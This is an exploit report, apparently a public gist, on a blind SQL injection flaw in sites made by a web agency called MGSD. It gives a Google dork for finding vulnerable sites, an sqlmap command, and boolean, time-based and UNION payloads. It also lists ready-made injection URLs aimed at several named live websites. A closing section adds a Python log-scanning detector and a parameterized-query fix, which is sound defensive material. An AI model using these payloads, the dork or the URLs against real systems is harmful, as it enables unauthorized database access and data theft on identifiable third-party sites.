Last active: April 15, 2024 17:37
*********************************************************
#Exploit Title: Conception & Réalisation MGSD - Blind Sql Injection Vulnerability
#Date: 2023-09-11
#Exploit Author: Behrouz Mansoori
#Google Dork: "Conception & Réalisation MGSD"
#Category: webapps
#Tested On: Mac, Firefox
[+] search Dork : "Conception & Réalisation MGSD" google hack
![image-20240416004338784](https://gist.github.com/assets/87851908/873d9e97-f422-4642-aef0-3c3bf42cca0b)
Example 1:
<<1.txt
GET /under_products_marechal.php?id= HTTP/1.1
Host: www.lakelec.com
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
sqlmap -r 1.txt -p "id" --batch --level 3 --risk 3 --random-agent
Payload:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: id=-5908' OR 5413=5413-- CZqv
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=' AND (SELECT 2816 FROM (SELECT(SLEEP(5)))PMke)-- TztO
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: id=' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71767a7671,0x4e506e4c444144656b7746677852557a6772564e504c444456674a42516d7a4b43617a4950637250,0x716a626b71),NULL-- -
![QQ图片20240416012201](https://gist.github.com/assets/87851908/ac40523d-6be1-4e94-a1d4-42484f8dd281)
Example 2:
https://www.cmcelqods-dz.com/notre-expertise-details.php?id=%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT(0x71767a7671,0x4e506e4c444144656b7746677852557a6772564e504c444456674a42516d7a4b43617a4950637250,0x716a626b71),NULL--%20-
https://www.cmcelqods-dz.com/injectables-details.php?id=%27%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x71767a7671,0x4e506e4c444144656b7746677852557a6772564e504c444456674a42516d7a4b43617a4950637250,0x716a626b71),NULL,NULL--%20-
https://www.cmcelqods-dz.com/nos-praticiens-detail.php?id=%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,substring(@@version,1,1)=1,NULL,NULL--%20-
https://www.tiziriceramica.com/en/actualites-detail.php?id=2%27%20and%20substring(@@version,1,1)=5--+&titre=Salon%20international%20des%20promoteurs%20immobiliers%20et%20maisons%20intelligentes%20E-LOGIA%20Oran
reference: https://cxsecurity.com/issue/WLB-2023090062
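For site operators, the three techniques in the sqlmap output above leave recognizable traces in web server access logs, because a legitimate `id` value is a plain integer. The following detection sketch is an added example, not part of the original report: it scans constructed log lines and labels non-integer `id` values by technique. The combined log format, the `/page.php` path and the client addresses are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format, hypothetical /page.php);
# the id values mirror the three payload shapes in the sqlmap output above.
SAMPLE_LOG = """\
203.0.113.7 - - [11/Sep/2023:10:00:01 +0000] "GET /page.php?id=42 HTTP/1.1" 200 5120
203.0.113.9 - - [11/Sep/2023:10:00:02 +0000] "GET /page.php?id=-5908%27%20OR%205413%3D5413--%20CZqv HTTP/1.1" 200 5120
203.0.113.9 - - [11/Sep/2023:10:00:09 +0000] "GET /page.php?id=%27%20AND%20(SELECT%202816%20FROM%20(SELECT(SLEEP(5)))PMke)--%20TztO HTTP/1.1" 200 811
203.0.113.9 - - [11/Sep/2023:10:00:10 +0000] "GET /page.php?id=%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT(0x71767a7671,0x41,0x716a626b71),NULL--%20- HTTP/1.1" 200 5200
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Checked in order, most specific first; labels match the report's "Type" lines.
SIGNATURES = [
    ("time-based blind", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("UNION query", re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I)),
    ("boolean-based blind", re.compile(r"\b(or|and)\b\s+\S+\s*=\s*\S+", re.I)),
]

def classify_id(value):
    """Return None for a plain integer id, else a label for the anomaly."""
    if re.fullmatch(r"\d+", value):
        return None
    for label, pattern in SIGNATURES:
        if pattern.search(value):
            return label
    return "non-numeric id"

def scan(log_text, param="id"):
    """Return (client_ip, label, decoded_value) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        ip, target = m.groups()
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for value in query.get(param, []):
            label = classify_id(value)
            if label:
                findings.append((ip, label, value))
    return findings

if __name__ == "__main__":
    for ip, label, value in scan(SAMPLE_LOG):
        print(f"{ip}\t{label}\t{value}")
```

The same integer-only rule that drives the detection is the fix on the application side: cast or validate `id` as an integer and pass it to the database through a parameterized query.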